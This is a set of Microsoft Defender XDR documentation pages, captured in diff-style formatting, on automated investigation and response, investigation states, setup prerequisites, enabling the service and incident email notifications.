--- Any investigation page in the <a href="https://go.microsoft.com/fwlink/p/?linkid=2077149" target="_blank">Microsoft Purview compliance portal</a>-- Any investigation page in the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com))-- Any incident or Action center experience in the <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a>-
-## Open the investigation details view
-
-You can open the investigation details view by using one of the following methods:
--- [Select an item in the Action center](#select-an-item-in-the-action-center)-- [Select an investigation from an incident details page](#open-an-investigation-from-an-incident-details-page)-
-### Select an item in the Action center
-
-The improved [Action center](m365d-action-center.md) ([https://security.microsoft.com/action-center](https://security.microsoft.com/action-center)) brings together [remediation actions](m365d-remediation-actions.md) across your devices, email & collaboration content, and identities. Listed actions include remediation actions that were taken automatically or manually. In the Action center, you can view actions that are awaiting approval and actions that were already approved or completed. You can also navigate to more details, such as an investigation page.
-
-> [!TIP]
-> You must have [certain permissions](m365d-action-center.md#required-permissions-for-action-center-tasks) to approve, reject, or undo actions.
-
-1. Go to <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a> and sign in.
-
-2. In the navigation pane, choose **Action center**.
-
-3. On either the **Pending** or **History** tab, select an item. Its flyout pane opens.
-
-4. Review the information in the flyout pane, and then take one of the following steps:
- - Select **Open investigation page** to view more details about the investigation.
- - Select **Approve** to initiate a pending action.
- - Select **Reject** to prevent a pending action from being taken.
- - Select **Go hunt** to go into [Advanced hunting](advanced-hunting-overview.md).
-
-### Open an investigation from an incident details page
-
-Use an incident details page to view detailed information about an incident, including alerts that were triggered information about any affected devices, user accounts, or mailboxes.
-
-1. Go to <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a> and sign in.
-
-2. In the navigation pane, choose **Incidents & alerts** > **Incidents**.
-
-3. Select an item in the list, and then choose **Open incident page**.
-
-4. Select the **Investigations** tab, and then select an investigation in the list. Its flyout pane opens.
-
-5. Select **Open investigation page**.
-
-Here's an example.
--
-## Investigation details
-
-Use the investigation details view to see past, current, and pending activity pertaining to an investigation. Here's an example.
--
-In the Investigation details view, you can see information on the **Investigation graph**, **Alerts**, **Devices**, **Identities**, **Key findings**, **Entities**, **Log**, and **Pending actions** tabs, described in the following table.
-
-> [!NOTE]
-> The specific tabs you see in an investigation details page depends on what your subscription includes. For example, if your subscription does not include Microsoft Defender for Office 365 Plan 2, you won't see a **Mailboxes** tab.
-
-| Tab | Description |
-|:--|:--|
-| **Investigation graph** | Provides a visual representation of the investigation. Depicts entities and lists threats found, along with alerts and whether any actions are awaiting approval.<br/>You can select an item on the graph to view more details. For example, selecting the **Evidence** icon takes you to the **Evidence** tab, where you can see detected entities and their verdicts. |
-| **Alerts** | Lists alerts associated with the investigation. Alerts can come from threat protection features on a user's device, in Office apps, Microsoft Defender for Cloud Apps, and other Microsoft Defender XDR features. <br> <br> If you see *Unsupported alert type*, it means that automated investigation capabilities cannot pick up that alert to run an automated investigation. However, you can [investigate these alerts manually](investigate-incidents.md#alerts).
-| **Devices** | Lists devices included in the investigation along with their remediation level. (Remediation levels correspond to [the automation level for device groups](m365d-configure-auto-investigation-response.md#review-or-change-the-automation-level-for-device-groups).) |
-| **Mailboxes** |Lists mailboxes that are impacted by detected threats. |
-| **Users** | Lists user accounts that are impacted by detected threats. |
-| **Evidence** | Lists pieces of evidence raised by alerts or investigations. Includes verdicts (*Malicious*, *Suspicious*, *Unknown*, or *No threats found*) and remediation status. |
-| **Entities** | Provides details about each analyzed entity, including a verdict for each entity type (*Malicious*, *Suspicious*, or *No threats found*).|
-|**Log** | Provides a chronological, detailed view of all the investigation actions taken after an alert was triggered.|
-| **Pending actions history** | Lists items that require approval to proceed. Go to the Action center ([https://security.microsoft.com/action-center](https://security.microsoft.com/action-center)) to approve pending actions. |
--
-## Investigation states
-
-The following table lists investigation states and what they indicate.
--
-|Investigation state |Definition |
-|||
-|Benign | Artifacts were investigated and a determination was made that no threats were found.|
-|PendingResource | An automated investigation is paused because either a remediation action is pending approval, or the device on which an artifact was found is temporarily unavailable.|
-|UnsupportedAlertType | An automated investigation is not available for this type of alert. Further investigation can be done manually, by using advanced hunting. |
-|Failed | At least one investigation analyzer ran into a problem where it couldn't complete the investigation. If an investigation fails after remediation actions were approved, the remediation actions might still have succeeded.|
-|Successfully remediated| An automated investigation completed, and all remediation actions were completed or approved.|
-
-To provide more context about how investigation states show up, the following table lists alerts and their corresponding automated investigation state. This table is included as an example of what a security operations team might see in the Microsoft Defender portal.
-
-|Alert name | Severity | Investigation state | Status | Category |
-|--|-||--|-|
-|Malware was detected in a wim disk image file|Informational|Benign|Resolved|Malware|
-|Malware was detected in a rar archive file|Informational|PendingResource|New|Malware|
-|Malware was detected in a rar archive file|Informational|UnsupportedAlertType|New|Malware|
-|Malware was detected in a rar archive file|Informational|UnsupportedAlertType|New|Malware|
-|Malware was detected in a rar archive file|Informational|UnsupportedAlertType|New|Malware|
-|Malware was detected in a zip archive file|Informational|PendingResource|New|Malware|
-|Malware was detected in a zip archive file|Informational|PendingResource|New|Malware|
-|Malware was detected in a zip archive file|Informational|PendingResource|New|Malware|
-|Malware was detected in a zip archive file|Informational|PendingResource|New|Malware|
-|Wpakill hacktool was prevented|Low|Failed|New|Malware|
-|GendowsBatch hacktool was prevented|Low|Failed|New|Malware|
-|Keygen hacktool was prevented|Low|Failed|New|Malware|
-|Malware was detected in a zip archive file|Informational|PendingResource|New|Malware|
-|Malware was detected in a rar archive file|Informational|PendingResource|New|Malware|
-|Malware was detected in a rar archive file|Informational|PendingResource|New|Malware|
-|Malware was detected in a zip archive file|Informational|PendingResource|New|Malware|
-|Malware was detected in a rar archive file|Informational|PendingResource|New|Malware|
-|Malware was detected in a rar archive file|Informational|PendingResource|New|Malware|
-|Malware was detected in an iso disc image file|Informational|PendingResource|New|Malware|
-|Malware was detected in an iso disc image file|Informational|PendingResource|New|Malware|
-|Malware was detected in a pst outlook data file|Informational|UnsupportedAlertType|New|Malware|
-|Malware was detected in a pst outlook data file|Informational|UnsupportedAlertType|New|Malware|
-|MediaGet detected|Medium|PartiallyInvestigated|New|Malware|
-|TrojanEmailFile|Medium|SuccessfullyRemediated|Resolved|Malware|
-|CustomEnterpriseBlock malware was prevented|Informational|SuccessfullyRemediated|Resolved|Malware|
-|An active CustomEnterpriseBlock malware was blocked|Low|SuccessfullyRemediated|Resolved|Malware|
-|An active CustomEnterpriseBlock malware was blocked|Low|SuccessfullyRemediated|Resolved|Malware|
-|An active CustomEnterpriseBlock malware was blocked|Low|SuccessfullyRemediated|Resolved|Malware|
-|TrojanEmailFile|Medium|Benign|Resolved|Malware|
-|CustomEnterpriseBlock malware was prevented|Informational|UnsupportedAlertType|New|Malware|
-|CustomEnterpriseBlock malware was prevented|Informational|SuccessfullyRemediated|Resolved|Malware|
-|TrojanEmailFile|Medium|SuccessfullyRemediated|Resolved|Malware|
-|TrojanEmailFile|Medium|Benign|Resolved|Malware|
-|An active CustomEnterpriseBlock malware was blocked|Low|PendingResource|New|Malware|
-
-## Next steps
--- [View and manage remediation actions](m365d-autoir-actions.md)-- [Learn more about remediation actions](m365d-remediation-actions.md)
security M365d Autoir https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/m365d-autoir.md
- Title: Automated investigation and response in Microsoft Defender XDR
-description: Get an overview of automated investigation and response capabilities, also called self-healing, in Microsoft Defender XDR
--- NOCSH-- Previously updated : 04/10/2023---- m365-security-- tier2-----
-# Automated investigation and response in Microsoft Defender XDR
--
-**Applies to:**
-- Microsoft Defender XDR-
-If your organization is using [Microsoft Defender XDR](microsoft-365-defender.md), your security operations team receives an alert within the Microsoft Defender portal whenever a malicious or suspicious activity or artifact is detected. Given the seemingly never-ending flow of threats that can come in, security teams often face the challenge of addressing the high volume of alerts. Fortunately, Microsoft Defender XDR includes automated investigation and response (AIR) capabilities that can help your security operations team address threats more efficiently and effectively.
-
-This article provides an overview of AIR and includes links to next steps and additional resources.
-
-## How automated investigation and self-healing works
-
-As security alerts are triggered, it's up to your security operations team to look into those alerts and take steps to protect your organization. Prioritizing and investigating alerts can be very time consuming, especially when new alerts keep coming in while an investigation is going on. Security operations teams can feel overwhelmed by the sheer volume of threats they must monitor and protect against. Automated investigation and response capabilities, with self-healing, in Microsoft Defender XDR can help.
-
-Watch the following video to see how self-healing works: <p>
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4BzwB]
-
-In Microsoft Defender XDR, automated investigation and response with self-healing capabilities works across your devices, email & content, and identities.
-> [!TIP]
-> This article describes how automated investigation and response works. To configure these capabilities, see [Configure automated investigation and response capabilities in Microsoft Defender XDR](m365d-configure-auto-investigation-response.md).
-
-## Your own virtual analyst
-
-Imagine having a virtual analyst in your Tier 1 or Tier 2 security operations team. The virtual analyst mimics the ideal steps that security operations would take to investigate and remediate threats. The virtual analyst could work 24x7, with unlimited capacity, and take on a significant load of investigations and threat remediation. Such a virtual analyst could significantly reduce the time to respond, freeing up your security operations team for other important threats or strategic projects. If this scenario sounds like science fiction, it's not! Such a virtual analyst is part of your Microsoft Defender XDR suite, and its name is *automated investigation and response*.
-
-Automated investigation and response capabilities enable your security operations team to dramatically increase your organization's capacity to deal with security alerts and incidents. With automated investigation and response, you can reduce the cost of dealing with investigation and response activities and get the most out of your threat protection suite. Automated investigation and response capabilities help your security operations team by:
-
-1. Determining whether a threat requires action.
-2. Taking (or recommending) any necessary remediation actions.
-3. Determining whether and what other investigations should occur.
-4. Repeating the process as necessary for other alerts.
-
-## The automated investigation process
-
-An alert creates an incident, which can start an automated investigation. The automated investigation results in a verdict for each piece of evidence. Verdicts can be:
-- *Malicious*-- *Suspicious* -- *No threats found* -
-Remediation actions for malicious or suspicious entities are identified. Examples of remediation actions include:
--- Sending a file to quarantine-- Stopping a process-- Isolating a device-- Blocking a URL -- Other actions-
-For more information, see [Remediation actions in Microsoft Defender XDR](m365d-remediation-actions.md).
-
-Depending on [how automated investigation and response capabilities are configured](m365d-configure-auto-investigation-response.md) for your organization, remediation actions are taken automatically or only upon approval by your security operations team. All actions, whether pending or completed, are listed in the [Action center](m365d-action-center.md).
-
-While an investigation is running, any other related alerts that arise are added to the investigation until it completes. If an affected entity is seen elsewhere, the automated investigation expands its scope to include that entity, and the investigation process repeats.
-
-In Microsoft Defender XDR, each automated investigation correlates signals across Microsoft Defender for Identity, Microsoft Defender for Endpoint, and Microsoft Defender for Office 365, as summarized in the following table:
-
-|Entities |Threat protection services |
-|:|:|
-|Devices (also referred to as endpoints or machines) |[Defender for Endpoint](../defender-endpoint/automated-investigations.md) |
-|On-premises Active Directory users, entity behavior, and activities |[Defender for Identity](/azure-advanced-threat-protection/what-is-atp) |
-|Email content (email messages that can contain files and URLs) |[Defender for Office 365](../office-365-security/defender-for-office-365.md) |
-
-> [!NOTE]
-> Not every alert triggers an automated investigation, and not every investigation results in automated remediation actions. It depends on how automated investigation and response is configured for your organization. See [Configure automated investigation and response capabilities](m365d-configure-auto-investigation-response.md).
-
-## Viewing a list of investigations
-
-To view investigations, go to the **Incidents** page. Select an incident, and then select the **Investigations** tab. To learn more, see [Details and results of an automated investigation](m365d-autoir-results.md).
-
-## Automated investigation & response card
-
-The new Automated investigation & response card is available in the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)). This new card visibility to the total number of available remediation actions. The card also gives an overview of all the alerts and required approval time for each alert.
--
-Using the Automated investigation & response card, your security operations team can quickly navigate to the Action center by selecting the **Approve in Action Center** link, and then taking appropriate actions. The card enables your security operations team to more effectively manage actions that are pending approval.
--
-## Next steps
--- [See the prerequisites for automated investigation and response](m365d-configure-auto-investigation-response.md#prerequisites-for-automated-investigation-and-response-in-microsoft-365-defender)-- [Configure automated investigation and response for your organization](m365d-configure-auto-investigation-response.md)-- [Learn more about the Action center](m365d-action-center.md)-
security M365d Configure Auto Investigation Response https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/m365d-configure-auto-investigation-response.md
- Title: Configure automated investigation and response capabilities in Microsoft Defender XDR
-description: Configure automated investigation and response with self-healing in Microsoft Defender XDR
----- Previously updated : 9/18/2023--- m365-security-- tier2--- autoir-- admindeeplinkDEFENDER---
-# Configure automated investigation and response capabilities in Microsoft Defender XDR
--
-Microsoft Defender XDR includes powerful [automated investigation and response capabilities](m365d-autoir.md) that can save your security operations team much time and effort. With [self-healing](m365d-autoir.md#how-automated-investigation-and-self-healing-works), these capabilities mimic the steps a security analyst would take to investigate and respond to threats, only faster, and with more ability to scale.
-
-This article describes how to configure automated investigation and response in <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender XDR</a> with these steps:
-
-1. [Review the prerequisites](#prerequisites-for-automated-investigation-and-response-in-microsoft-365-defender).
-2. [Review or change the automation level for device groups](#review-or-change-the-automation-level-for-device-groups).
-3. [Review your security and alert policies in Office 365](#review-your-security-and-alert-policies-in-office-365).
-
-Then, after you're all set up, you can [view and manage remediation actions in the Action center](m365d-autoir-actions.md). And, if necessary, you can [make changes to automated investigation settings](#need-to-make-changes-to-automated-investigation-settings).
-
-<a name='prerequisites-for-automated-investigation-and-response-in-microsoft-365-defender'></a>
-
-## Prerequisites for automated investigation and response in Microsoft Defender XDR
-
-|Requirement|Details|
-|||
-|Subscription requirements|One of these subscriptions: <ul><li>Microsoft 365 E5</li><li>Microsoft 365 A5</li><li>Microsoft 365 E3 with the Microsoft 365 E5 Security add-on</li><li>Microsoft 365 A3 with the Microsoft 365 A5 Security add-on</li><li>Office 365 E5 plus Enterprise Mobility + Security E5 plus Windows E5</li></ul> <br/> See [Microsoft Defender XDR licensing requirements](./prerequisites.md#licensing-requirements).|
-|Network requirements|<ul><li>[Microsoft Defender for Identity](/azure-advanced-threat-protection/what-is-atp) enabled</li><li>[Microsoft Defender for Cloud Apps](/cloud-app-security/what-is-cloud-app-security) configured</li><li>[Microsoft Defender for Identity integration](/cloud-app-security/mdi-integration)</li></ul>|
-|Windows device requirements|<ul><li>Windows 11</li><li>Windows 10, version 1709 or later installed (See [Windows release information](/windows/release-information/))</li><li>The following threat protection services are configured:<ul><li>[Microsoft Defender for Endpoint](../defender-endpoint/configure-endpoints.md)</li><li>[Microsoft Defender Antivirus](/windows/security/threat-protection/windows-defender-antivirus/configure-windows-defender-antivirus-features)</li></ul></li></ul>|
-|Protection for email content and Office files|<ul><li>[Microsoft Defender for Office 365 is configured](/microsoft-365/security/office-365-security/defender-for-office-365#configure-atp-policies)</li><li>[Automated investigation and remediation capabilities in Defender for Endpoint are configured](/microsoft-365/security/defender-endpoint/configure-automated-investigations-remediation) (required for manual response actions, such as deleting email messages on devices)</li></ul>|
-|Permissions|To configure automated investigation and response capabilities, you must have one of the following roles assigned in either Microsoft Entra ID (<https://portal.azure.com>) or in the Microsoft 365 admin center (<https://admin.microsoft.com>): <ul><li>Global Administrator</li><li>Security Administrator</li></ul>To work with automated investigation and response capabilities, such as by reviewing, approving, or rejecting pending actions, see [Required permissions for Action center tasks](m365d-action-center.md#required-permissions-for-action-center-tasks).|
-
-## Review or change the automation level for device groups
-
-Whether automated investigations run, and whether remediation actions are taken automatically or only upon approval for your devices depend on certain settings, such as your organization's device group policies. Review the configured automation level for your device group policies. You must be a global administrator or security administrator to perform the following procedure:
-
-1. Go to the Microsoft Defender portal at <https://security.microsoft.com> and sign in.
-
-2. Go to **Settings** \> **Endpoints** \> **Device groups** under **Permissions**.
-
-3. Review your device group policies. In particular, look at the **Automation level** column. We recommend using **Full - remediate threats automatically**. You might need to create or edit your device groups to get the level of automation you want. To get help with this task, see the following articles:
-
- - [How threats are remediated](/windows/security/threat-protection/microsoft-defender-atp/automated-investigations#how-threats-are-remediated)
- - [Create and manage device groups](/windows/security/threat-protection/microsoft-defender-atp/machine-groups)
-
-## Review your security and alert policies in Office 365
-
-Microsoft provides built-in [alert policies](../office-365-security/alert-policies-defender-portal.md) that help identify certain risks. These risks include Exchange admin permissions abuse, malware activity, potential external and internal threats, and data lifecycle management risks. Some alerts can trigger [automated investigation and response in Office 365](../office-365-security/air-about.md). Make sure your [Defender for Office 365](../office-365-security/defender-for-office-365.md) features are configured correctly.
-
-Although certain alerts and security policies can trigger automated investigations, *no remediation actions are taken automatically for email and content*. Instead, all remediation actions for email and email content await approval by your security operations team in the [Action center](m365d-action-center.md).
-
-Security settings in Exchange Online Protection (EOP) and Defender for Office 365 help protect email and content. We recommend using the Standard and Strict [preset security policies](../office-365-security/preset-security-policies.md#preset-security-policies-in-eop-and-microsoft-defender-for-office-365) to assign protection to users.
-
-If you're using custom policies, use the [Configuration analyzer](../office-365-security/configuration-analyzer-for-security-policies.md) to compare your policy settings to the Standard and Strict preset security policy settings. For a detailed listing of all policy settings, see the tables in [Recommended settings for EOP and Microsoft Defender for Office 365 security](../office-365-security/recommended-settings-for-eop-and-office365.md).
-
-You can review your [alert policies](../office-365-security/alert-policies-defender-portal.md) in the Defender portal at <https://security.microsoft.com> \> **Policies & rules** \> **Alert policy** or directly at <https://security.microsoft.com/alertpoliciesv2>. Several default alert policies are in the **Threat management** category. Some of the alert policies in the **Threat management** category can trigger automated investigation and response. To learn more, see [Threat management alert policies](/purview/alert-policies#threat-management-alert-policies).
-
-## Need to make changes to automated investigation settings?
-
-You can choose from several options to change settings for your automated investigation and response capabilities. Some options are listed in the following table:
-
-|To do this|Follow these steps|
-|||
-|Specify automation levels for groups of devices|<ol><li>Set up one or more device groups. See [Create and manage device groups](../defender-endpoint/machine-groups.md). </li><li>In the Microsoft Defender portal, go to **Permissions** \> **Endpoints roles & groups** \> **Device groups**.</li><li>Select a device group and review its **Automation level** setting. (We recommend using **Full - remediate threats automatically**). See [Automation levels in automated investigation and remediation capabilities](../defender-endpoint/automation-levels.md).</li><li>Repeat steps 2 and 3 as appropriate for all your device groups. </li></ol>|
-
-## Next steps
--- [Remediation actions in Microsoft Defender XDR](m365d-remediation-actions.md)-- [Visit the Action center](m365d-action-center.md)-
security M365d Enable Faq https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/m365d-enable-faq.md
- Title: Frequently asked questions when turning on Microsoft Defender XDR
-description: Get answers to the most commonly asked questions about licensing, permissions, initial settings, and other products and services related to enabling Microsoft Defender XDR
-
- - NOCSH
------ m365-security-- tier3--
- - MOE150
- - MET150
Previously updated : 02/17/2021--
-# Frequently asked questions when turning on Microsoft Defender XDR
---
-**Applies to:**
--- Microsoft Defender XDR-
-Read responses to the most commonly asked questions about turning on [Microsoft Defender XDR](microsoft-365-defender.md), including required licenses and permissions, deploying support services, and initial settings.
-
-For instructions on how to turn on the service, [read Turn on Microsoft Defender XDR](m365d-enable.md).
-
-## I don't have a Microsoft 365 E5 license. Can I still use Microsoft Defender XDR?
-
-Customers with the following non-E5 licenses can use Microsoft Defender XDR:
--- Microsoft Defender for Endpoint-- Microsoft Defender for Identity-- Microsoft Defender for Cloud Apps-- Defender for Office 365 (Plan 2)-
-For a full list of supported licenses, [read the licensing requirements](prerequisites.md#licensing-requirements).
-
-<a name='do-i-need-to-install-or-deploy-anything-to-start-using-microsoft-365-defender'></a>
-
-## Do I need to install or deploy anything to start using Microsoft Defender XDR?
-
-No, Microsoft Defender XDR consolidates data from Microsoft 365 security services that you have already deployed. Once you turn it on, incident, automation, and hunting experiences will start working within the scope of the deployed products. If none of these products are properly deployed, Microsoft Defender XDR will not display any data and is unable to take any action.
-
-To optimize your Microsoft Defender XDR experiences, we recommend deploying *all* supported [Microsoft 365 security products and services](deploy-supported-services.md).
-
-<a name='where-does-microsoft-365-defender-process-and-store-my-data'></a>
-
-## Where does Microsoft Defender XDR process and store my data?
-
-Microsoft Defender XDR automatically selects an optimal location for the data center where consolidated data is processed and stored. If you have Microsoft Defender for Endpoint, it selects the same location used by Defender for Endpoint.
-
-> [!NOTE]
-> Microsoft Defender for Endpoint automatically provisions in European Union (EU) data centers when turned on through Microsoft Defender for Cloud. Microsoft Defender XDR will automatically provision in the same EU data center for customers who have provisioned Microsoft Defender for Endpoint in this manner.
-
-The data center location is shown before and after the service is provisioned in the settings page for Microsoft Defender XDR (**Settings > Microsoft Defender XDR**). If you prefer to use another data center location, select **Need help?** in the Microsoft Defender portal to contact Microsoft support.
-
-<a name='where-can-i-access-microsoft-365-defender'></a>
-
-## Where can I access Microsoft Defender XDR?
-
-Microsoft Defender XDR is available at: <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank"><https://security.microsoft.com></a>.
-
-<a name='what-permissions-do-i-need-to-access-microsoft-365-defender'></a>
-
-## What permissions do I need to access Microsoft Defender XDR?
-
-Accounts assigned the following Microsoft Entra roles can access Microsoft Defender XDR functionality and data:
--- Global administrator-- Security administrator-- Security Operator-- Global Reader-- Security Reader-- Compliance Administrator-- Compliance Data Administrator-- Application Administrator-- Cloud Application Administrator-
-> [!NOTE]
-> Role-based access control settings in Microsoft Defender for Endpoint influence access to data. For more information, read about [managing access to Microsoft Defender XDR](m365d-permissions.md).
->
-> If you are running the Microsoft Defender XDR preview program you can now also experience the new Microsoft Defender 365 role-based access control (RBAC) model. For more information, see [Microsoft Defender XDR role-based access control (RBAC) model](./manage-rbac.md).
-
-<a name='what-time-zone-does-microsoft-365-defender-default-to'></a>
-
-## What time zone does Microsoft Defender XDR default to?
-
-By default, Microsoft Defender XDR displays time information in the UTC time zone. You can change this setting to use your local time zone. [Learn about setting the time zone](m365d-time-zone.md)
-
-<a name='how-can-i-learn-about-new-microsoft-365-defender-feature-and-ui-updates'></a>
-
-## How can I learn about new Microsoft Defender XDR feature and UI updates?
-
-Microsoft regularly provides information through the various channels, including:
--- Blogposts in the [Microsoft 365 security & compliance tech community](https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/bg-p/MicrosoftThreatProtectionBlog)-- Go to [Defender monthly news](https://aka.ms/defendernews)-- The [message center](../../admin/manage/message-center.md) in Microsoft 365 admin center--
-Get the latest publicly available experiences by turning on [preview features](preview.md).
-
-## Related topics
--- [Microsoft Defender XDR overview](microsoft-365-defender.md)-- [Turn on Microsoft Defender XDR](m365d-enable.md).-- [Licensing requirements and other prerequisites](prerequisites.md)-- [Deploy supported services](deploy-supported-services.md)-- [Setup guides for Microsoft Defender XDR](deploy-configure-m365-defender.md)-- [Turn on preview features](preview.md)
security M365d Enable https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/m365d-enable.md
- Title: Turn on Microsoft Defender XDR
-description: Learn how to enable Microsoft Defender XDR and start integrating your security incident and response.
-
- - NOCSH
----
- - m365-security
- - m365solution-getstarted
- - highpri
- - tier1
-
- - MOE150
- - MET150
Previously updated : 09/21/2023--
-# Turn on Microsoft Defender XDR
---
-**Applies to:**
-- Microsoft Defender XDR-
-[Microsoft Defender XDR](microsoft-365-defender.md) unifies your incident response process by integrating key capabilities across Microsoft Defender for Endpoint, Microsoft Defender for Office 365, Microsoft Defender for Cloud Apps, and Microsoft Defender for Identity. This unified experience adds powerful features you can access in the Microsoft Defender portal.
-
-Microsoft Defender XDR automatically turns on when eligible customers with the required permissions visit Microsoft Defender portal. Read this article to understand various prerequisites and how Microsoft Defender XDR is provisioned.
-
-## Check license eligibility and required permissions
-
-A license to a Microsoft 365 security product generally entitles you to use Microsoft Defender XDR without additional licensing cost. We do recommend getting a Microsoft 365 E5, E5 Security, A5, or A5 Security license or a valid combination of licenses that provides access to all supported services.
-
-For detailed licensing information, [read the licensing requirements](prerequisites.md#licensing-requirements).
-
-### Check your role
-
-You must be one of the following roles to turn on Microsoft Defender XDR:
--- Global Administrator-- Security Administrator-- Security Operator-- Global Reader-- Security Reader-- Compliance Administrator-- Compliance Data Administrator-- Application Administrator-- Cloud Application Administrator-
-[View your roles in Microsoft Entra ID](/azure/active-directory/users-groups-roles/directory-manage-roles-portal)
-
-## Supported services
-
-Microsoft Defender XDR aggregates data from the various supported services that you've already deployed. It will process and store data centrally to identify new insights and make centralized response workflows possible. It does this without affecting existing deployments, settings, or data associated with the integrated services.
-
-To get the best protection and optimize Microsoft Defender XDR, we recommend deploying all applicable supported services on your network. For more information, [read about deploying supported services](deploy-supported-services.md).
-
-## Onboard to the service
-
-Onboarding to Microsoft Defender XDR is simple. From the navigation menu, select any item, such as **Incidents & alerts**, **Hunting**, **Action center**, or **Threat analytics** to initiate the onboarding process.
-
-### Data center location
-
-Microsoft Defender XDR will store and process data in the [same location used by Microsoft Defender for Endpoint](/windows/security/threat-protection/microsoft-defender-atp/data-storage-privacy). If you don't have Microsoft Defender for Endpoint, a new data center location is automatically selected based on the location of active Microsoft 365 security services. The selected data center location is shown in the screen.
-
-Select **Need help?** in the Microsoft Defender portal to contact Microsoft support about provisioning Microsoft Defender XDR in a different data center location.
-
-> [!NOTE]
-> In the past, Microsoft Defender for Endpoint automatically provisioned in European Union (EU) data centers when turned on through Microsoft Defender for Cloud. Microsoft Defender XDR will automatically provision in the same EU data center for customers who have provisioned Defender for Endpoint in this manner in the past.
-
-### Confirm that the service is on
-
-Once the service is provisioned, it adds:
--- [Incidents management](incidents-overview.md)-- [Alerts queue](investigate-alerts.md)-- An action center for managing [automated investigation and response](m365d-autoir.md)-- [Advanced hunting](advanced-hunting-overview.md) capabilities-- Threat analytics-
-*Microsoft Defender portal with incidents management and other capabilities*
-
-### Getting Microsoft Defender for Identity data
-
-To enable the integration with Microsoft Defender for Cloud Apps, you'll need to log in to the Microsoft Defender for Cloud Apps at least once.
-
-## Get assistance
-
-To get answers to the most commonly asked questions about turning on Microsoft Defender XDR, [read the FAQ](m365d-enable-faq.md).
-
-Microsoft support staff can help provision or deprovision the service and related resources on your tenant. For assistance, select **Need help?** in the Microsoft Defender portal. When contacting support, mention Microsoft Defender XDR.
-
-## Related topics
--- [Frequently asked questions](m365d-enable-faq.md)-- [Licensing requirements and other prerequisites](prerequisites.md)-- [Deploy supported services](deploy-supported-services.md)-- [Setup guides for Microsoft Defender XDR](deploy-configure-m365-defender.md)-- [Microsoft Defender XDR overview](microsoft-365-defender.md)-- [Microsoft Defender for Endpoint overview](../defender-endpoint/microsoft-defender-endpoint.md)-- [Defender for Office 365 overview](../office-365-security/defender-for-office-365.md)-- [Microsoft Defender for Cloud Apps overview](/cloud-app-security/what-is-cloud-app-security)-- [Microsoft Defender for Identity overview](/azure-advanced-threat-protection/what-is-atp)-- [Microsoft Defender for Endpoint data storage](../defender-endpoint/data-storage-privacy.md)
security M365d Notifications Incidents https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/m365d-notifications-incidents.md
- Title: Get incident notifications by email in Microsoft Defender XDR
-description: Set up email notifications to get notified of new incidents or updates to incidents in Microsoft Defender XDR.
-
- - NOCSH
----
- - m365-security
- - tier1
-
- - MOE150
- - MET150
Previously updated : 09/18/2023--
-# Get incident notifications by email in Microsoft Defender XDR
--
-**Applies to:**
--- Microsoft Defender XDR--
-You can set up Microsoft Defender XDR to notify your staff with an email about new incidents or updates to existing incidents. You can choose to get notifications based on:
--- Alert severity-- Alert sources -- Device group-
-**Choose to receive email notifications only for specific service source**:
-You can easily select specific service sources that you want to get email notifications for.
-
-**Get more granularity with specific detection sources**:
-You can get notifications only for a specific detection source.
-
-**Set the severity per detection or service source**:
-You can choose to get email notifications only on specific severities per source. For example, you can get notified for Medium and High alerts for EDR and all severities for Microsoft Defender Experts.
-
-The email notification contains important details about the incident like the incident name, severity, and categories, among others. You can also go directly to the incident and start your analysis right away. For more information, see [Investigate incidents](investigate-incidents.md).
-
-You can add or remove recipients in the email notifications. New recipients get notified about incidents after they're added.
-
-> [!NOTE]
-> You need the **Manage security settings** permission to configure email notification settings. If you've chosen to use basic permissions management, users with Security Administrator or Global Administrator roles can configure email notifications. <br> <br>
-Likewise, if your organization is using role-based access control (RBAC), you can only create, edit, delete, and receive notifications based on device groups that you are allowed to manage.
-
-## Create a rule for email notifications
-
-Follow these steps to create a new rule and customize email notification settings.
-
-1. Go to [Microsoft Defender XDR](https://security.microsoft.com) in the navigation pane, select **Settings > Microsoft Defender XDR > Incident email notifications**.
-2. Select **Add item**.
-3. On the **Basics** page, type the rule name and a description, and then select **Next**.
-4. On the **Notification settings** page, configure:
- - **Alert severity** - Choose the alert severities that will trigger an incident notification. For example, if you only want to be informed about high-severity incidents, select **High**.
- - **Device group scope** - You can specify all device groups or select from the list of device groups in your tenant.
- - **Send only one notification per incident** - Select if you want one notification per incident.
- - **Include organization name in the email** - Select if you want your organization name to appear in the email notification.
- - **Include tenant-specific portal link** - Select if you want to add a link with the tenant ID in the email notification for access to a specific Microsoft 365 tenant.
-
- :::image type="content" source="../../media/get-incident-notifications/incidents-email-notification-settings.png" alt-text="Screenshot of the Notification settings page for incident email notifications in the Microsoft Defender portal." lightbox="../../media/get-incident-notifications/incidents-email-notification-settings.png":::
-
-5. Select **Next**. On the **Recipients** page, add the email addresses that will receive the incident notifications. Select **Add** after typing each new email address. To test notifications and ensure that the recipients receive them in the inboxes, select **Send test email**.
-6. Select **Next**. On the **Review rule** page, review the settings of the rule, and then select **Create rule**. Recipients will start receiving incident notifications through email based on the settings.
-
-To edit an existing rule, select it from the list of rules. On the pane with the rule name, select **Edit rule** and make your changes on the **Basics**, **Notification settings**, and **Recipients** pages.
-
-To delete a rule, select it from the list of rules. On the pane with the rule name, select **Delete**.
-
-Once you get the notification, you can go directly to the incident and start your investigation right away. For more information on investigating incidents, see [Investigate incidents in Microsoft Defender XDR](investigate-incidents.md).
-
-## Next steps
--- [Get email notifications on response actions](m365d-response-actions-notifications.md)-- [Get email notifications about new reports in Threat analytics](m365d-threat-analytics-notifications.md)-
-## See also
--- [Investigate incidents in Microsoft Defender XDR](investigate-incidents.md)
